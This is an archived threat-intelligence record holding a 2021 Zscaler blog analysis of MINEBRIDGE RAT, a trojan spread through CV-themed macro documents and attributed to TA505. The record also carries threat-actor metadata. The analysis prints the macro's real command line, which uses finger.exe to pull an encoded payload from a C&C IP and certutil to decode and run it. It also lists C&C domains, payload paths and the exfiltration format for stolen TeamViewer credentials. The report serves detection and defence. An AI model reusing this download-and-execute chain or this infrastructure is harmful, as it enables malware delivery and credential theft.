{ "id": "847a3fc9-fd53-4e81-b305-f8a4d4580dec", "created_at": "2026-04-06T00:18:45.343005Z", "updated_at": "2026-04-10T03:36:37.042271Z", "deleted_at": null, "sha1_hash": "c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6", "title": "MINEBRIDGE Remote-access Trojan (RAT) 2021 | Zscaler Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2275889, "plain_text": "MINEBRIDGE Remote-access Trojan (RAT) 2021 | Zscaler Blog\r\nBy Sudeep Singh, Sahil Antil\r\nPublished: 2021-02-23 · Archived: 2026-04-02 12:02:17 UTC\r\nIntroduction\r\nIn Jan 2021, Zscaler ThreatLabZ discovered new instances of the MINEBRIDGE remote-access Trojan (RAT)\r\nembedded in macro-based Word document files crafted to look like valid job resumes (CVs). Such lures are often\r\nused as social engineering schemes by threat actors.\r\nMINEBRIDGE buries itself into the vulnerable remote desktop software TeamViewer, enabling the threat actor to\r\ntake a wide array of remote follow-on actions such as spying on users or deploying additional malware.\r\nWe have recently observed other instances of threat actors targeting security researchers with social engineering\r\ntechniques. While the threat actor we discuss in this blog is not the same, the use of social engineering tactics\r\ntargeting security teams appears to be on an upward trend.\r\nWe also observed a few changes in the tactics, techniques, and procedures (TTPs) of the threat actor since the last\r\ninstance of MINEBRIDGE RAT was observed in March 2020. In this blog, we provide insights into the changes\r\nin TTPs, threat attribution, command-and-control (C\u0026C)  infrastructure, and a technical analysis of the attack\r\nflow.\r\n \r\nThreat attribution\r\nThis attack was likely carried out by TA505, a financially motivated threat group that has been active since at least\r\n2014. TA505 has been previously linked to very similar attacks using MINEBRIDGE RAT. The job resume theme\r\nand C\u0026C infrastructure used in this new instance is consistent and in line with these former attacks. Due to the\r\nlow volume of samples we identified for this new attack, we attribute it to the same threat actor with a moderate\r\nconfidence level.\r\n \r\nAttack flow\r\nFigure 1 below details the attack flow.\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 1 of 16\n\nFigure 1: Attack flow\r\nMacro technical analysis\r\nFor the purpose of technical analysis of the attack flow, we will look at the macro-based Word document with the\r\nMD5 hash: f95643710018c437754b8a11cc943348\r\nWhen the Word document is opened and the macros are enabled, it displays the message: “File successfully\r\nconverted from PDF” for social engineering purposes.\r\nThis message is followed by displaying the decoy document as shown below. Figure 2 shows the contents of the\r\ndecoy document which resemble a job resume (CV) of a threat intelligence analyst.\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 2 of 16\n\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 3 of 16\n\nFigure 2: Decoy files using the CV of security researcher for social engineering purposes\r\nThe macro code uses basic string obfuscation as shown in Figure 3.\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 4 of 16\n\nFigure 3: Contents of the obfuscated macro\r\nIt constructs the following command line and then executes it using Windows Management Instrumentation\r\n(WMI).\r\nCommand line: cmd /C finger nc20@184.164.146.102 \u003e %appdata%\\vUCooUr \u003e\u003e %appdata%\\vUCooUr1 \u0026\u0026\r\ncertutil -decode %appdata%\\vUCooUr1 %appdata%\\vUCooUr.exe \u0026\u0026cmd /C del %appdata%\\vUCooUr1 \u0026\u0026\r\n%appdata%\\vUCooUr.exe\r\nThis command leverages the Windows utility finger.exe to download encoded content from the IP address:\r\n184.164.146.102 and drops it in the %appdata% directory. The encoded content is decoded using the legitimate\r\nWindows utility certutil.exe and executed.\r\nThe usage of finger.exe to download the encoded content from the C\u0026C server is one of the major TTP changes\r\nby this threat actor.\r\nWe see an increase in usage of living-off-the-land binaries (LOLBins) by the threat actor to download, decode,\r\nand execute the content in this new instance.\r\n \r\nStage 1: SFX archive\r\nThe content decoded using certutil.exe is a self-extracting archive (SFX) which we describe in this section of the\r\nblog.\r\nMD5 hash of SFX archive: 73b7b416d3e5b1ed0aa49bda20f7729a\r\nContents of the SFX archive are shown in Figure 4. It spoofs a legitimate TeamViewer application.\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 5 of 16\n\nFigure 4: Contents of the SFX archive\r\nUpon execution, this SFX archive drops the legitimate TeamViewer binaries, a few DLLs and some document\r\nfiles.\r\nExecution flow starts with the binary called defrender.exe, which is masked to appear as a Windows Defender\r\nbinary.\r\nStage 2 – DLL Side Loading\r\nThe dropped binary defrender.exe is a legitimate TeamViewer application version 11.2.2150.0 which is vulnerable\r\nto DLL side loading. Upon execution, it loads the msi.dll binary present in the same directory. The msi.dll is the\r\nfile that performs further malicious activity in the system.\r\nNext, MSI.dll unpacks a shellcode and executes it. The part of code responsible for shellcode unpacking and\r\nexecution is shown in Figure 5.\r\nFigure 5: Shellcode unpacking and execution\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 6 of 16\n\nThe shellcode further unpacks another DLL with MD5 hash: 59876020bb9b99e9de93f1dd2b14c7e7 from a\r\nhardcoded offset, maps it into the memory, and finally transfers the code execution to its entry point. The\r\nunpacked DLL is a UPX-packed binary of MINEBRIDGE RAT.\r\n \r\nStage 3: MINEBRIDGE RAT DLL\r\nOn unpacking the UPX layer we get the main MINEBRIDGE RAT DLL with MD5 hash:\r\n23edc18075533a4bb79b7c4ef71ff314.\r\n \r\nExecution checks\r\nAt the very beginning, MINEBRIDGE RAT confirms that the DLL is not executed either via regsvr32.exe or\r\nrundll32.exe.\r\nThen it checks the command-line argument and perform the following operations:\r\n1. If the command-line argument is __RESTART__ then sleep for 5 seconds and perform the operations\r\nwhich are described further.\r\n2. If the command-line argument is __START__ then it starts a BITS job to download a zip file-based\r\npayload and perform the operations which are described further.\r\nFigure 6 shows the relevant command line checks performed by MINEBRIDGE RAT.\r\nFigure 6: Module name and command-line argument check/\r\n \r\nBITS Job download\r\nThe BITS job downloads a zip file by selecting a random C\u0026C domain from the hardcoded list inside the DLL\r\nusing path “/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin”. The downloaded DLL is dropped to a hardcoded\r\nfilename “~f834ygf8yrubgfy4sd23.bin” in the %temp% directory. When the download is completed, the zip file is\r\nextracted to “%ProgramData%\\VolumeDrive\\”,\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 7 of 16\n\nFigure 7 shows the relevant code section responsible for using bitsadmin to download the payload.\r\nFigure 7: BITS job to download the payload file and extract it to %ProgramData%\\VolumeDrive\\\r\nAfter performing the above-mentioned checks, it loads the legitimate MSI.dll from %System32% directory to\r\ninitialize its own Export Address Table. This is done to prevent application crashes when any of the export\r\nfunctions are called. It then generates the BOT_ID after doing some computations with VolumeSerialNumber.\r\nFigure 8: Export address table initialization and BOT_ID generation\r\nAPI Hooking\r\nMINEBRIDGE RAT then uses the mHook module to hook the following APIs, intercepting function calls in order\r\nto avoid accidental exposure of malicious code execution to the user:\r\nMessageBoxA         \r\nMessageBoxW         \r\nSetWindowTextW      \r\nIsWindowVisible     \r\nDialogBoxParamW     \r\nShowWindow          \r\nRegisterClassExW    \r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 8 of 16\n\nCreateWindowExW      \r\nCreateDialogParamW  \r\nShell_NotifyIconW   \r\nShellExecuteExW      \r\nGetAdaptersInfo     \r\nRegCreateKeyExW     \r\nSetCurrentDirectoryW\r\nCreateMutexW        \r\nCreateMutexA        \r\nCreateFileW         \r\nGetVolumeInformationW\r\nSince the last observed instance of this attack in 2020, a few more APIs have been added to the hook list which are\r\nhighlighted in bold above -- but interestingly, the project path leaked by the mHook module remains unchanged.\r\nC:\\users\\maximys\\desktop\\eric_guft@jabbeer.com\\mhook_lib\\mhook_lib\\disasm-lib\\disasm.c\r\nFinally, if all the APIs are hooked successfully, MINEBRIDGE RAT creates three threads in a sequence that\r\nperform the following tasks:\r\n1. First thread is responsible for C\u0026C communication and achieving persistence.\r\n2. Second thread gathers when the last input was retrieved to check system idle status.\r\n3. Third thread kills the ShowNotificationDialog process regularly to avoid any notification popups.\r\nFigure 9: Hooks APIs and creates threads\r\nPersistence\r\nFor persistence, MINEBRIDGE RAT creates a LNK file with the name “Windows Logon.lnk” in the startup\r\ndirectory. The LNK file points to the currently executing binary with icon same as “wlrmdr.exe” and description as\r\n“Windows Logon”.\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 9 of 16\n\nFigure 10: LNK file properties showing target path and Icon source\r\nC\u0026C communication\r\nMINEBRIDGE RAT supports the following C\u0026C commands:\r\n●    drun_command\r\n●    rundll_command\r\n●    update_command\r\n●    restart_command\r\n●    terminate_command\r\n●    kill_command\r\n●    poweroff_command\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 10 of 16\n\n●    reboot_command\r\n●    Setinterval_command\r\nAt the time of analysis, we didn’t receive any active response from the C2 server. However, based on the code\r\nflow, the communication mechanism seems to be the same as previously reported attack instances. Detailed\r\nanalysis of C2 communication\r\ncan be found in this report\r\n.\r\nAlternate attack flow\r\nThe MINEBRIDGE RAT DLL also has the support to be executed via regsvr32.exe. The malicious code is present\r\ninside the DllRegisterServer export. When executed via regsvr32.exe or rundll32.exe, the DllMain routine won’t\r\nperform any actions but regsvr32.exe also calls DllRegisterServer export implicitly and, hence, the malicious code\r\ninside DllRegisterServer export gets executed.\r\nInterestingly, the check at the very beginning of the code inside DllRegisterServer export verifies that the process\r\nname is regsvr32.exe and only then executes the code further.\r\nWe didn’t see this code path using regsvr32.exe trigger in the current attack instance but it fits with what has been\r\nreported in earlier instances from FireEye and the advisory report with a few changes in filenames and payload\r\ndirectory.\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 11 of 16\n\nFigure 11: Payload download from DllRegisterServer export\r\n \r\nZscaler Cloud Sandbox report\r\nFigure 12 shows the sandbox detection for the macro-based document used in the attack.\r\nFigure 12: Zscaler Cloud Sandbox detection\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at\r\nvarious levels.\r\nWin32.Backdoor.MINEBRIDGE\r\nVBA.Downloader.MINEBRIDGE\r\nMITRE ATT\u0026CK TTP Mapping\r\nID Tactic Technique\r\nT1566.001 Spearphishing Attachment Uses doc based attachments with VBA macro\r\nT1204.002 User Execution: Malicious File\r\nUser opens the document file and enables the VBA\r\nmacro \r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 12 of 16\n\nT1547.001 Registry Run Keys / Startup Folder\r\nCreates LNK file in the startup folder for payload\r\nexecution\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nStrings and other data are obfuscated in the payloads\r\nT1036.005\r\nMasquerading: Match Legitimate\r\nName or Location\r\nFile name used similar to legit Windows Defender\r\nbinary\r\nT1027.002\r\nObfuscated Files or Information:\r\nSoftware Packing\r\nPayloads are packed in layers\r\nT1574.002\r\nHijack Execution Flow: DLL Side-LoadingUses legit TeamViewer binary with dll-side loading\r\nvulnerability\r\nT1218 Signed Binary Proxy Execution\r\nUses finger.exe for encoded payload download and\r\ncertutil.exe to decode the payload\r\nT1056.002 Input Capture: GUI Input Capture\r\nCaptures TeamViewer generated UsedID and\r\nPassword by hooking GUI APIs\r\nT1057 Process Discovery Verifies the name of parent process\r\nT1082 System Information Discovery Gathers system OS version info\r\nT1033 System Owner/User Discovery Gathers currently logged in Username\r\nT1071.001\r\nApplication Layer Protocol: Web\r\nProtocols\r\nUses https for C\u0026C communication\r\nT1041 Exfiltration Over C\u0026C Channel Data is exfiltrated using existing C2 channel\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 13 of 16\n\nIndicators of compromise\r\nDocument hashes\r\nf95643710018c437754b8a11cc943348 \r\n41c8f361278188b77f96c868861c111e\r\nFilenames\r\nMarisaCV.doc\r\nRicardoITCV.doc\r\nBinary hashes\r\n73b7b416d3e5b1ed0aa49bda20f7729a [SFX Archive]\r\nd12c80de0cf5459d96dfca4924f65144 [msi.dll]\r\n59876020bb9b99e9de93f1dd2b14c7e7 [UPX packed MineBridge RAT]\r\n23edc18075533a4bb79b7c4ef71ff314 [Unpacked MineBridge RAT] \r\nC\u0026C domains\r\n// Below is a comprehensive list of C\u0026C domains related to this threat actor\r\nbillionaireshore.top\r\nvikingsofnorth.top\r\nrealityarchitector.top\r\ngentlebouncer.top\r\nbrainassault.top\r\ngreatersky.top\r\nunicornhub.top\r\ncorporatelover.top\r\nbloggersglobbers.top\r\nNetwork paths\r\n// The network paths below are accessed by MineBridge RAT either using HTTP GET or POST requests\r\n/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin\r\n/~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin\r\n/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php\r\nUser-agent:\r\n\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko)\r\nVersion/11.0 Mobile/15B150 Safari/604.1\"\r\nNetwork data fetch using finger.exe\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 14 of 16\n\n// Format: username@ip_address\r\nnc20@184.164.146.102\r\nDownloaded files\r\n// Payloads are dropped in following paths\r\n%temp%/~f834ygf8yrubgfy4sd23.bin\r\n%temp%/~t62btc7rbg763vbywgr6734.bin\r\n%appdata%\\vUCooUr1 \r\n%appdata%\\vUCooUr.exe \r\n%programdata%\\Local Tempary\\defrender.exe\r\n%programdata%\\Local Tempary\\msi.dll\r\n%programdata%\\Local Tempary\\TeamViewer_Desktop.exe\r\n%programdata%\\Local Tempary\\TeamViewer_Resource_en.dll\r\n%programdata%\\Local Tempary\\TeamViewer_StaticRes.dll\r\n{STARTUP}\\Windows Logon.lnk\r\nExfiltrated user and system info\r\n// Format string\r\nuuid=%s\u0026id=%s\u0026pass=%s\u0026username=%s\u0026pcname=%s\u0026osver=%s\u0026timeout=%d\r\nThe table below summarises the meaning of individual fields.\r\n \r\nField name Purpose\r\nuuid BOT-ID of the user\r\nid TeamViewer ID of the user\r\npass TeamViewer password\r\nusername Currently logged in user name\r\npcname Name of the computer\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 15 of 16\n\nosver Operating system version\r\ntimeout Timeout between requests\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures" ], "report_names": [ "return-minebridge-rat-new-ttps-and-social-engineering-lures" ], "threat_actors": [ { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434725, "ts_updated_at": 1775792197, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6.pdf", "text": "https://archive.orkl.eu/c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6.txt", "img": "https://archive.orkl.eu/c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6.jpg" } }